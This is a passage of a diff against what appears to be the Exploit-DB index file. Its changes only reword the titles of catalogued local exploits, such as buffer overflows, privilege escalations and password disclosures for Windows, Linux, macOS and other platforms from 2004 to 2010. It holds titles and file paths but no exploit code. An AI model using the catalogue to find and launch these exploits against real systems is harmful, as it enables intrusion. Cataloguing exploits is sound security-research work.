String",2004-12-14,CoKi,linux,local,0 694,platforms/windows/local/694.c,"WinRAR 3.4.1 - Corrupt '.ZIP' File (PoC)",2004-12-16,"Vafa Khoshaein",windows,local,0 695,platforms/linux/local/695.c,"Cscope 15.5 - Symlink Exploit",2004-12-17,Gangstuck,linux,local,0 698,platforms/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow",2004-12-20,"Kristoffer BrÃ¥nemyr",ultrix,local,0 @@ -5901,15 +5902,15 @@ id,file,description,date,author,platform,type,port 798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure",2005-02-08,Kozan,windows,local,0 803,platforms/windows/local/803.c,"DelphiTurk FTP 1.0 - Passwords to Local Users Exploit",2005-02-09,Kozan,windows,local,0 811,platforms/windows/local/811.c,"DelphiTurk e-Posta 1.0 - Local Exploit",2005-02-10,Kozan,windows,local,0 -816,platforms/linux/local/816.c,"GNU a2ps - 'Anything to PostScript' Local Exploit (Not SUID)",2005-02-13,lizard,linux,local,0 -824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid)",2005-09-13,Qnix,linux,local,0 +816,platforms/linux/local/816.c,"GNU a2ps - 'Anything to PostScript' Not SUID Local Exploit",2005-02-13,lizard,linux,local,0 +824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Non SUID Local Shell Exploit",2005-09-13,Qnix,linux,local,0 833,platforms/windows/local/833.cpp,"PeerFTP 5 - Local Password Disclosure",2005-02-22,Kozan,windows,local,0 834,platforms/windows/local/834.c,"eXeem 0.21 - Local Password Disclosure",2005-02-22,Kozan,windows,local,0 835,platforms/windows/local/835.c,"SendLink 1.5 - Local Password Disclosure",2005-02-22,Kozan,windows,local,0 836,platforms/windows/local/836.c,"WWW File Share Pro 2.72 - Local Password Disclosure",2005-02-23,Kozan,windows,local,0 837,platforms/windows/local/837.c,"Chat Anywhere 2.72a - Local Password Disclosure",2005-02-23,Kozan,windows,local,0 839,platforms/windows/local/839.cpp,"Avaya IP Office Phone Manager - Local Password Disclosure",2005-02-24,"Adrian _pagvac_ Pastor",windows,local,0 -844,platforms/windows/local/844.asm,"eXeem 0.21 - Local Password Disclosure (asm)",2005-02-26,illwill,windows,local,0 +844,platforms/windows/local/844.asm,"eXeem 0.21 - Local Password Disclosure (ASM)",2005-02-26,illwill,windows,local,0 846,platforms/windows/local/846.cpp,"Einstein 1.01 - Local Password Disclosure",2005-02-27,Kozan,windows,local,0 848,platforms/windows/local/848.asm,"Einstein 1.01 - Local Password Disclosure (ASM)",2005-02-28,illwill,windows,local,0 863,platforms/windows/local/863.cpp,"RealNetworks RealPlayer 10 - '.smil' Local Buffer Overflow",2005-03-07,nolimit,windows,local,0 @@ -6040,9 +6041,9 @@ id,file,description,date,author,platform,type,port 1973,platforms/osx/local/1973.pl,"Apple Mac OSX 10.4.6 (PPC) - 'launchd' Local Format String",2006-07-01,"Kevin Finisterre",osx,local,0 1978,platforms/windows/local/1978.pl,"Microsoft Excel - Universal Hlink Local Buffer Overflow",2006-07-02,"SYS 49152",windows,local,0 1985,platforms/windows/local/1985.py,"WinRAR 3.60 Beta 6 - SFX Path Local Stack Overflow",2006-07-05,muts,windows,local,0 -1986,platforms/windows/local/1986.cpp,"Microsoft Excel 2000/2003 - Hlink Local Buffer Overflow (French)",2006-07-06,NSRocket,windows,local,0 -1988,platforms/windows/local/1988.pl,"Microsoft Excel 2003 - Hlink Local Buffer Overflow (Italian)",2006-07-06,oveRet,windows,local,0 -1992,platforms/windows/local/1992.py,"WinRAR 3.60 Beta 6 - SFX Path Local Stack Overflow (French)",2006-07-07,"Jerome Athias",windows,local,0 +1986,platforms/windows/local/1986.cpp,"Microsoft Excel 2000/2003 (French) - Hlink Local Buffer Overflow",2006-07-06,NSRocket,windows,local,0 +1988,platforms/windows/local/1988.pl,"Microsoft Excel 2003 (Italian) - Hlink Local Buffer Overflow",2006-07-06,oveRet,windows,local,0 +1992,platforms/windows/local/1992.py,"WinRAR 3.60 Beta 6 (French) - SFX Path Local Stack Overflow",2006-07-07,"Jerome Athias",windows,local,0 1999,platforms/windows/local/1999.pl,"Microsoft Word 2000/2003 - Hlink Local Buffer Overflow (PoC)",2006-07-09,"SYS 49152",windows,local,0 2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Privilege Escalation (1)",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0 2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Privilege Escalation (2)",2006-07-12,"Julien Tinnes",linux,local,0 @@ -6055,7 +6056,7 @@ id,file,description,date,author,platform,type,port 2056,platforms/windows/local/2056.c,"Microsoft IIS - ASP Stack Overflow (MS06-034)",2006-07-21,cocoruder,windows,local,0 2065,platforms/windows/local/2065.c,"Cheese Tracker 0.9.9 - Local Buffer Overflow (PoC)",2006-07-23,"Luigi Auriemma",windows,local,0 2067,platforms/solaris/local/2067.c,"Solaris 10 - 'sysinfo()' Local Kernel Memory Disclosure (1)",2006-07-24,prdelka,solaris,local,0 -2091,platforms/windows/local/2091.cpp,"Microsoft PowerPoint 2003 SP2 - Local Code Execution (French)",2006-07-30,NSRocket,windows,local,0 +2091,platforms/windows/local/2091.cpp,"Microsoft PowerPoint 2003 SP2 (French) - Local Code Execution",2006-07-30,NSRocket,windows,local,0 2094,platforms/windows/local/2094.c,"Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Buffer Overflows",2006-07-31,"Luigi Auriemma",windows,local,0 2106,platforms/osx/local/2106.pl,"Apple Mac OSX 10.4.7 (x86) - 'fetchmail' Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 2107,platforms/osx/local/2107.pl,"Apple Mac OSX 10.4.7 (PPC) - 'fetchmail' Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 @@ -6084,7 +6085,7 @@ id,file,description,date,author,platform,type,port 2543,platforms/solaris/local/2543.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (1)",2006-10-13,"Marco Ivaldi",solaris,local,0 2565,platforms/osx/local/2565.pl,"Xcode OpenBase 9.1.5 (OSX) - Privilege Escalation",2006-10-15,"Kevin Finisterre",osx,local,0 2569,platforms/solaris/local/2569.sh,"Solaris 10 libnspr - 'LD_PRELOAD' Arbitrary File Creation Privilege Escalation (2)",2006-10-16,"Marco Ivaldi",solaris,local,0 -2580,platforms/osx/local/2580.pl,"Xcode OpenBase 9.1.5 (OSX) - Privilege Escalation (Root File Create)",2006-10-16,"Kevin Finisterre",osx,local,0 +2580,platforms/osx/local/2580.pl,"Xcode OpenBase 9.1.5 (OSX) - Root File Create Privilege Escalation",2006-10-16,"Kevin Finisterre",osx,local,0 2581,platforms/linux/local/2581.c,"Nvidia Graphics Driver 8774 - Local Buffer Overflow",2006-10-16,"Rapid7 Security",linux,local,0 2633,platforms/hp-ux/local/2633.c,"HP-UX 11i - 'swpackage' Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 2634,platforms/hp-ux/local/2634.c,"HP-UX 11i - 'swmodify' Stack Overflow Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 @@ -6106,7 +6107,7 @@ id,file,description,date,author,platform,type,port 3070,platforms/osx/local/3070.pl,"VideoLAN VLC Media Player 0.8.6 (x86) - 'udp://' Format String",2007-01-02,MoAB,osx,local,0 3071,platforms/windows/local/3071.c,"Microsoft Vista - 'NtRaiseHardError' Privilege Escalation",2007-01-03,erasmus,windows,local,0 3087,platforms/osx/local/3087.rb,"Apple Mac OSX 10.4.8 - DiskManagement BOM Privilege Escalation",2007-01-05,MoAB,osx,local,0 -3088,platforms/osx/local/3088.rb,"Apple Mac OSX 10.4.8 - DiskManagement BOM (cron) Privilege Escalation",2007-01-05,MoAB,osx,local,0 +3088,platforms/osx/local/3088.rb,"Apple Mac OSX 10.4.8 - DiskManagement BOM 'cron' Privilege Escalation",2007-01-05,MoAB,osx,local,0 3094,platforms/bsd/local/3094.c,"OpenBSD 3.x < 4.0 - 'vga_ioctl()' Privilege Escalation",2007-01-07,"Critical Security",bsd,local,0 3102,platforms/osx/local/3102.rb,"Application Enhancer (APE) 2.0.2 - Privilege Escalation",2007-01-08,MoAB,osx,local,0 3131,platforms/windows/local/3131.c,"Kaspersky AntiVirus 6.0 - Privilege Escalation",2007-01-15,MaD,windows,local,0 @@ -6125,8 +6126,8 @@ id,file,description,date,author,platform,type,port 3220,platforms/windows/local/3220.c,"Multiple Printer Providers (Spooler Service) - Privilege Escalation",2007-01-29,"Andres Tarasco",windows,local,0 3260,platforms/windows/local/3260.txt,"Microsoft Word 2000 - Unspecified Code Execution",2007-02-03,xCuter,windows,local,0 3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - 'ps' Information Leak Exploit",2007-02-06,bunker,tru64,local,0 -3330,platforms/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (1)",2007-02-18,Revenge,linux,local,0 -3333,platforms/linux/local/3333.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (2)",2007-02-19,Revenge,linux,local,0 +3330,platforms/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1)",2007-02-18,Revenge,linux,local,0 +3333,platforms/linux/local/3333.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2)",2007-02-19,Revenge,linux,local,0 3342,platforms/windows/local/3342.c,"News Rover 12.1 Rev 1 - Remote Stack Overflow (1)",2007-02-20,Marsu,windows,local,0 3349,platforms/windows/local/3349.c,"News Bin Pro 5.33 - '.nbi' Local Buffer Overflow",2007-02-21,Marsu,windows,local,0 3356,platforms/linux/local/3356.sh,"Nortel SSL VPN Linux Client 6.0.3 - Privilege Escalation",2007-02-21,"Jon Hart",linux,local,0 @@ -6172,7 +6173,7 @@ id,file,description,date,author,platform,type,port 3692,platforms/windows/local/3692.c,"IrfanView 3.99 - '.ani' Local Buffer Overflow (2)",2007-04-09,"Breno Silva Pinto",windows,local,0 3695,platforms/windows/local/3695.c,"Microsoft Windows - Animated Cursor '.ani' Local Overflow",2007-04-09,"Breno Silva Pinto",windows,local,0 3727,platforms/windows/local/3727.c,"VCDGear 3.56 Build 050213 - 'FILE' Local Code Execution",2007-04-13,InTeL,windows,local,0 -3730,platforms/linux/local/3730.txt,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' Local Overflow (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0 +3730,platforms/linux/local/3730.txt,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' exec-shield Local Overflow",2007-04-13,Xpl017Elz,linux,local,0 3755,platforms/windows/local/3755.c,"Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",windows,local,0 3757,platforms/windows/local/3757.txt,"OllyDbg 1.10 - Local Format String",2007-04-17,jamikazu,windows,local,0 3772,platforms/windows/local/3772.c,"PhotoFiltre Studio 8.1.1 - '.tif' Local Buffer Overflow",2007-04-21,Marsu,windows,local,0 @@ -6243,7 +6244,7 @@ id,file,description,date,author,platform,type,port 4584,platforms/windows/local/4584.c,"Kodak Image Viewer - TIF/TIFF Code Execution (PoC) (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local,0 4612,platforms/aix/local/4612.py,"IBM AIX 5.3.0 - 'setlocale()' Privilege Escalation",2007-11-07,"Thomas Pollet",aix,local,0 4625,platforms/windows/local/4625.txt,"Microsoft Jet Engine - '.MDB' File Parsing Stack Overflow (PoC)",2007-11-16,cocoruder,windows,local,0 -4698,platforms/linux/local/4698.c,"Send ICMP Nasty Garbage (sing) - Append File Logrotate Exploit",2007-12-06,bannedit,linux,local,0 +4698,platforms/linux/local/4698.c,"Send ICMP Nasty Garbage (SING) - Append File Logrotate Exploit",2007-12-06,bannedit,linux,local,0 4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 - '.MP4' File Stack Overflow",2007-12-08,"SYS 49152",windows,local,0 4702,platforms/windows/local/4702.pl,"Microsoft Windows Media Player 6.4 - '.MP4' File Stack Overflow (PoC)",2007-12-08,"SYS 49152",windows,local,0 4703,platforms/windows/local/4703.pl,"NullSoft Winamp 5.32 - .MP4 Tags Stack Overflow",2007-12-08,"SYS 49152",windows,local,0 @@ -6256,7 +6257,7 @@ id,file,description,date,author,platform,type,port 4938,platforms/windows/local/4938.py,"Microsoft Visual Basic Enterprise 6 SP6 - '.dsr' File Handling Buffer Overflow",2008-01-18,shinnai,windows,local,0 4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - 'pitrig_drop' PLSQL Injection 'get users hash'",2008-01-28,sh2kerr,multiple,local,0 4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection 'get users hash'",2008-01-28,sh2kerr,multiple,local,0 -4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys Password)",2008-01-28,sh2kerr,multiple,local,0 +4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (Change Sys Password)",2008-01-28,sh2kerr,multiple,local,0 4998,platforms/windows/local/4998.c,"IrfanView 4.10 - '.fpx' Memory Corruption",2008-01-28,Marsu,windows,local,0 5004,platforms/windows/local/5004.c,"SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0 5032,platforms/windows/local/5032.c,"Total Video Player 1.03 - '.m3u' File Local Buffer Overflow",2008-02-01,"fl0 fl0w",windows,local,0 @@ -6357,9 +6358,9 @@ id,file,description,date,author,platform,type,port 7707,platforms/windows/local/7707.py,"IntelliTamper (2.07/2.08) - Language Catalog Overflow (SEH)",2009-01-08,Cnaph,windows,local,0 7713,platforms/windows/local/7713.pl,"VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (2)",2009-01-09,Houssamix,windows,local,0 7714,platforms/windows/local/7714.pl,"VUPlayer 2.49 - '.asx' HREF Local Buffer Overflow (1)",2009-01-11,sCORPINo,windows,local,0 -7715,platforms/windows/local/7715.py,"VUPlayer 2.49 - '.asx' (HREF) Universal Buffer Overflow",2009-01-11,His0k4,windows,local,0 +7715,platforms/windows/local/7715.py,"VUPlayer 2.49 - '.asx' 'HREF' Universal Buffer Overflow",2009-01-11,His0k4,windows,local,0 7727,platforms/windows/local/7727.pl,"Microsoft HTML Workshop 4.74 - Universal Buffer Overflow",2009-01-12,SkD,windows,local,0 -7745,platforms/windows/local/7745.py,"VUPlayer 2.49 - '.asx' (Universal) Local Buffer Overflow",2009-01-13,Encrypt3d.M!nd,windows,local,0 +7745,platforms/windows/local/7745.py,"VUPlayer 2.49 - '.asx' Universal Local Buffer Overflow",2009-01-13,Encrypt3d.M!nd,windows,local,0 7765,platforms/windows/local/7765.py,"OtsTurntables 1.00.027 - '.ofl' Local Stack Overflow",2009-01-14,suN8Hclf,windows,local,0 7839,platforms/windows/local/7839.py,"Total Video Player 1.31 - 'DefaultSkin.ini' Local Stack Overflow",2009-01-20,His0k4,windows,local,0 7843,platforms/windows/local/7843.c,"Browser3D 3.5 - '.sfs' Local Stack Overflow (C)",2009-01-22,SimO-s0fT,windows,local,0 @@ -6367,7 +6368,7 @@ id,file,description,date,author,platform,type,port 7853,platforms/windows/local/7853.pl,"Elecard MPEG Player - '.m3u' Local Stack Overflow",2009-01-25,AlpHaNiX,windows,local,0 7855,platforms/linux/local/7855.txt,"PostgreSQL 8.2/8.3/8.4 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0 7856,platforms/linux/local/7856.txt,"MySQL 4/5/6 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0 -7888,platforms/windows/local/7888.pl,"Zinf Audio Player 2.2.1 - '.pls' Local Buffer Overflow (Universal)",2009-01-28,Houssamix,windows,local,0 +7888,platforms/windows/local/7888.pl,"Zinf Audio Player 2.2.1 - '.pls' Universal Local Buffer Overflow",2009-01-28,Houssamix,windows,local,0 7923,platforms/windows/local/7923.c,"Total Video Player 1.3.7 - '.m3u' Local Buffer Overflow",2009-01-29,SimO-s0fT,windows,local,0 7929,platforms/windows/local/7929.c,"GOM Player 2.0.12 - '.pls' Universal Buffer Overflow",2009-01-30,Stack,windows,local,0 7957,platforms/windows/local/7957.pl,"Free Download Manager 3.0 Build 844 - '.torrent' Buffer Overflow",2009-02-03,SkD,windows,local,0 @@ -6397,8 +6398,8 @@ id,file,description,date,author,platform,type,port 8179,platforms/windows/local/8179.rb,"Mediacoder 0.6.2.4275 - Universal Buffer Overflow (SEH)",2009-03-09,Stack,windows,local,0 8189,platforms/windows/local/8189.txt,"VUPlayer 2.49 - '.cue' Universal Buffer Overflow",2009-03-10,Stack,windows,local,0 8193,platforms/windows/local/8193.py,"RainbowPlayer 0.91 - Playlist Universal Overwrite (SEH)",2009-03-10,His0k4,windows,local,0 -8201,platforms/windows/local/8201.pl,"Foxit Reader 3.0 (Build 1301) - PDF Buffer Overflow (Universal)",2009-03-13,SkD,windows,local,0 -8214,platforms/windows/local/8214.c,"Rosoft Media Player 4.2.1 - Local Buffer Overflow (multi target)",2009-03-16,SimO-s0fT,windows,local,0 +8201,platforms/windows/local/8201.pl,"Foxit Reader 3.0 (Build 1301) - PDF Universal Buffer Overflow",2009-03-13,SkD,windows,local,0 +8214,platforms/windows/local/8214.c,"Rosoft Media Player 4.2.1 - Local Buffer Overflow",2009-03-16,SimO-s0fT,windows,local,0 8231,platforms/windows/local/8231.php,"CDex 1.70b2 (Windows XP SP3) - '.ogg' Local Buffer Overflow",2009-03-18,Nine:Situations:Group,windows,local,0 8233,platforms/windows/local/8233.py,"Chasys Media Player 1.1 - '.pls' Local Stack Overflow",2009-03-18,His0k4,windows,local,0 8234,platforms/windows/local/8234.py,"Chasys Media Player 1.1 - '.pls' Stack Overflow (2)",2009-03-18,Encrypt3d.M!nd,windows,local,0 @@ -6415,7 +6416,7 @@ id,file,description,date,author,platform,type,port 8270,platforms/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow",2009-03-23,Koshi,windows,local,0 8274,platforms/windows/local/8274.pl,"POP Peeper 3.4.0.0 - '.eml' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local,0 8275,platforms/windows/local/8275.pl,"POP Peeper 3.4.0.0 - '.html' Universal Overwrite (SEH)",2009-03-23,Stack,windows,local,0 -8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader - JBIG2 Universal Exploit (Bind Shell Port 5500)",2009-03-24,"Black Security",windows,local,0 +8280,platforms/windows/local/8280.txt,"Adobe Acrobat Reader - JBIG2 Universal Exploit",2009-03-24,"Black Security",windows,local,0 8299,platforms/windows/local/8299.py,"Abee Chm Maker 1.9.5 - '.CMP' Stack Overflow",2009-03-27,Encrypt3d.M!nd,windows,local,0 8301,platforms/windows/local/8301.pl,"PowerCHM 5.7 - 'hhp' Local Buffer Overflow",2009-03-29,LiquidWorm,windows,local,0 8303,platforms/linux/local/8303.c,"pam-krb5 < 3.13 - Privilege Escalation",2009-03-29,"Jon Oberheide",linux,local,0 @@ -6463,7 +6464,7 @@ id,file,description,date,author,platform,type,port 8629,platforms/windows/local/8629.pl,"Mini-stream ASX to MP3 Converter 3.0.0.7 - '.RAM' Buffer Overflow",2009-05-07,G4N0K,windows,local,0 8630,platforms/windows/local/8630.pl,"Mini-stream ASX to MP3 Converter 3.0.0.7 - '.asx HREF' Local Buffer Overflow",2009-05-07,G4N0K,windows,local,0 8631,platforms/windows/local/8631.pl,"Mini-stream Ripper 3.0.1.1 - '.RAM' Local Buffer Overflow",2009-05-07,G4N0K,windows,local,0 -8632,platforms/windows/local/8632.pl,"Mini-stream Ripper 3.0.1.1 - '.asx' (HREF) Local Buffer Overflow",2009-05-07,G4N0K,windows,local,0 +8632,platforms/windows/local/8632.pl,"Mini-stream Ripper 3.0.1.1 - '.asx' 'HREF' Local Buffer Overflow",2009-05-07,G4N0K,windows,local,0 8633,platforms/windows/local/8633.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - '.RAM' Local Buffer Overflow",2009-05-07,G4N0K,windows,local,0 8634,platforms/windows/local/8634.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - '.asx' Local Buffer Overflow",2009-05-07,G4N0K,windows,local,0 8637,platforms/windows/local/8637.pl,"GrabIt 1.7.2x - NZB DTD Reference Buffer Overflow",2009-05-07,"Jeremy Brown",windows,local,0 @@ -6529,7 +6530,7 @@ id,file,description,date,author,platform,type,port 9272,platforms/windows/local/9272.py,"Adobe Acrobat 9.1.2 NOS - Privilege Escalation (Python)",2009-07-27,Dr_IDE,windows,local,0 9286,platforms/windows/local/9286.pl,"MP3 Studio 1.0 - '.mpf' / '.m3u' Local Stack Overflow (SEH)",2009-07-28,corelanc0d3r,windows,local,0 9291,platforms/windows/local/9291.pl,"MP3 Studio 1.0 - '.mpf' Local Buffer Overflow (SEH)",2009-07-28,Koshi,windows,local,0 -9298,platforms/windows/local/9298.pl,"Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (update)",2009-07-30,corelanc0d3r,windows,local,0 +9298,platforms/windows/local/9298.pl,"Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (2)",2009-07-30,corelanc0d3r,windows,local,0 9299,platforms/windows/local/9299.pl,"WINMOD 1.4 - '.lst' File Local Stack Overflow XP SP3 (RET + SEH) (3)",2009-07-28,corelanc0d3r,windows,local,0 9301,platforms/windows/local/9301.txt,"Microsoft Windows XP - 'win32k.sys' Privilege Escalation",2009-07-30,"NT Internals",windows,local,0 9302,platforms/linux/local/9302.py,"Compface 1.1.5 - '.xbm' Local Buffer Overflow",2009-07-30,His0k4,linux,local,0 @@ -6564,10 +6565,10 @@ id,file,description,date,author,platform,type,port 9483,platforms/windows/local/9483.pl,"Photodex ProShow Gold 4 - '.psh' Universal Buffer Overflow XP SP3 (SEH)",2009-08-24,corelanc0d3r,windows,local,0 9486,platforms/windows/local/9486.pl,"KSP 2006 FINAL - '.m3u' Universal Local Buffer Exploit (SEH)",2009-08-24,hack4love,windows,local,0 9488,platforms/freebsd/local/9488.c,"FreeBSD 6.1 - 'kqueue()' Null Pointer Dereference Privilege Escalation",2009-08-24,"Przemyslaw Frasunek",freebsd,local,0 -9489,platforms/multiple/local/9489.txt,"BSD (Multiple Distributions) - 'setusercontext()' Vulnerabilities",2009-08-24,kingcope,multiple,local,0 +9489,platforms/multiple/local/9489.txt,"BSD (Multiple Distributions) - 'setusercontext()' Exploit",2009-08-24,kingcope,multiple,local,0 9492,platforms/windows/local/9492.c,"Avast! 4.8.1335 Professional - Kernel Local Buffer Overflow",2009-08-24,Heurs,windows,local,0 9495,platforms/windows/local/9495.pl,"Fat Player 0.6b - '.wav' Universal Local Buffer Exploit",2009-08-24,ahwak2000,windows,local,0 -9501,platforms/windows/local/9501.py,"Audacity 1.2 - '.gro' Universal Buffer Overflow (egg hunter)",2009-08-24,mr_me,windows,local,0 +9501,platforms/windows/local/9501.py,"Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)",2009-08-24,mr_me,windows,local,0 9509,platforms/windows/local/9509.pl,"Media Jukebox 8 - '.m3u' Universal Local Buffer Exploit (SEH)",2009-08-25,hack4love,windows,local,0 9513,platforms/linux/local/9513.c,"Linux Kernel 2.6.31-rc7 - 'AF_LLC getsockname' 5-Byte Stack Disclosure (PoC)",2009-08-25,"Jon Oberheide",linux,local,0 9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - '.psh' Universal Buffer Overflow (SEH)",2009-08-25,hack4love,windows,local,0 @@ -6606,7 +6607,7 @@ id,file,description,date,author,platform,type,port 9661,platforms/windows/local/9661.c,"MP3 Studio 1.0 - '.m3u' Local Buffer Overflow",2009-09-14,dmc,windows,local,0 9680,platforms/windows/local/9680.txt,"Protector Plus AntiVirus 8/9 - Privilege Escalation",2009-09-15,"Maxim A. Kulakov",windows,local,0 9687,platforms/windows/local/9687.py,"SAP Player 0.9 - '.pla' Universal Local Buffer Overflow (SEH)",2009-09-15,mr_me,windows,local,0 -9688,platforms/hardware/local/9688.txt,"NetAccess IP3 - Authenticated (ping option) Command Injection",2009-09-15,r00t,hardware,local,0 +9688,platforms/hardware/local/9688.txt,"NetAccess IP3 - Authenticated Ping Option Command Injection",2009-09-15,r00t,hardware,local,0 9709,platforms/linux/local/9709.txt,"Changetrack 4.3-3 - Privilege Escalation",2009-09-17,Rick,linux,local,0 9807,platforms/windows/local/9807.txt,"Adobe Photoshop Elements 8.0 - Active File Monitor Privilege Escalation",2009-09-29,pyrokinesis,windows,local,0 9831,platforms/windows/local/9831.txt,"Avast! AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation",2009-09-23,Evilcry,windows,local,0 @@ -6657,16 +6658,16 @@ id,file,description,date,author,platform,type,port 10267,platforms/multiple/local/10267.txt,"Oracle - ctxsys.drvxtabc.create_tables Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 10268,platforms/multiple/local/10268.txt,"Oracle - SYS.LT.REMOVEWORKSPACE Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 10280,platforms/windows/local/10280.py,"AIMP2 Audio Converter 2.53 build 330 - Playlist '.pls' Unicode Buffer Overflow",2009-11-21,mr_me,windows,local,0 -10281,platforms/windows/local/10281.php,"Adobe Illustrator CS4 14.0.0 - Encapsulated Postscript (.eps) Buffer Overflow",2009-12-03,pyrokinesis,windows,local,0 +10281,platforms/windows/local/10281.php,"Adobe Illustrator CS4 14.0.0 - Encapsulated Postscript '.eps' Buffer Overflow",2009-12-03,pyrokinesis,windows,local,0 10295,platforms/windows/local/10295.txt,"DAZ Studio - Arbitrary Command Execution",2009-12-03,"Core Security",windows,local,0 10296,platforms/php/local/10296.txt,"PHP 5.2.10/5.3.0 - 'ini_restore()' Memory Information Disclosure",2009-12-03,"Maksymilian Arciemowicz",php,local,0 -10298,platforms/windows/local/10298.c,"Jasc Paint Shop Pro 8 - Local Buffer Overflow (Universal)",2009-12-04,"fl0 fl0w",windows,local,0 +10298,platforms/windows/local/10298.c,"Jasc Paint Shop Pro 8 - Local Universal Buffer Overflow",2009-12-04,"fl0 fl0w",windows,local,0 10313,platforms/linux/local/10313.c,"Libmodplug - 's3m' Remote Buffer Overflow",2008-02-25,dummy,linux,local,0 10319,platforms/windows/local/10319.py,"PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow",2009-12-05,Dr_IDE,windows,local,0 10320,platforms/windows/local/10320.py,"M3U To ASX-WPL 1.1 - '.m3u' Buffer Overflow",2009-12-05,Encrypt3d.M!nd,windows,local,0 10321,platforms/windows/local/10321.py,"Microsoft HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (1)",2009-12-05,Encrypt3d.M!nd,windows,local,0 10322,platforms/windows/local/10322.py,"Audacity 1.2.6 - '.gro' Buffer Overflow",2009-12-05,Encrypt3d.M!nd,windows,local,0 -10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 - hhp Buffer Overflow (Universal)",2009-12-05,Dz_attacker,windows,local,0 +10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 - hhp Universal Buffer Overflow",2009-12-05,Dz_attacker,windows,local,0 10326,platforms/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Buffer Overflow",2009-02-03,"Wolfgang Hamann",multiple,local,0 10332,platforms/windows/local/10332.rb,"PointDev IDEAL Administration 2009 9.7 - Buffer Overflow (Metasploit)",2009-12-06,dookie,windows,local,0 10335,platforms/windows/local/10335.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit)",2009-12-07,loneferret,windows,local,0 @@ -6726,10 +6727,10 @@ id,file,description,date,author,platform,type,port 11152,platforms/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0 11154,platforms/windows/local/11154.py,"BS.Player 2.51 - Universal Overflow (SEH)",2010-01-16,Dz_attacker,windows,local,0 11161,platforms/windows/local/11161.pl,"Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (1)",2010-01-16,Red-D3v1L,windows,local,0 -11171,platforms/windows/local/11171.pl,"Audiotran 1.4.1 - Buffer Overflow (Direct RET)",2010-01-17,jacky,windows,local,0 +11171,platforms/windows/local/11171.pl,"Audiotran 1.4.1 - Direct RET Buffer Overflow",2010-01-17,jacky,windows,local,0 11174,platforms/windows/local/11174.c,"VideoLAN VLC Media Player 0.8.6 a/b/c/d (Win32 Universal) - '.ass' Buffer Overflow",2010-01-17,"fl0 fl0w",windows,local,0 11191,platforms/windows/local/11191.pl,"Millenium MP3 Studio 1.x - '.m3u' Local Stack Overflow",2010-01-19,NeoCortex,windows,local,0 -11199,platforms/windows/local/11199.txt,"Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - User Mode to Ring Escalation (KiTrap0D) (MS10-015)",2010-01-19,"Tavis Ormandy",windows,local,0 +11199,platforms/windows/local/11199.txt,"Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - 'KiTrap0D' User Mode to Ring Escalation (MS10-015)",2010-01-19,"Tavis Ormandy",windows,local,0 11202,platforms/windows/local/11202.pl,"RM Downloader - '.m3u' Buffer Overflow (SEH)",2010-01-19,jacky,windows,local,0 11205,platforms/windows/local/11205.pl,"MP3 Studio 1.x - '.m3u' Local Stack 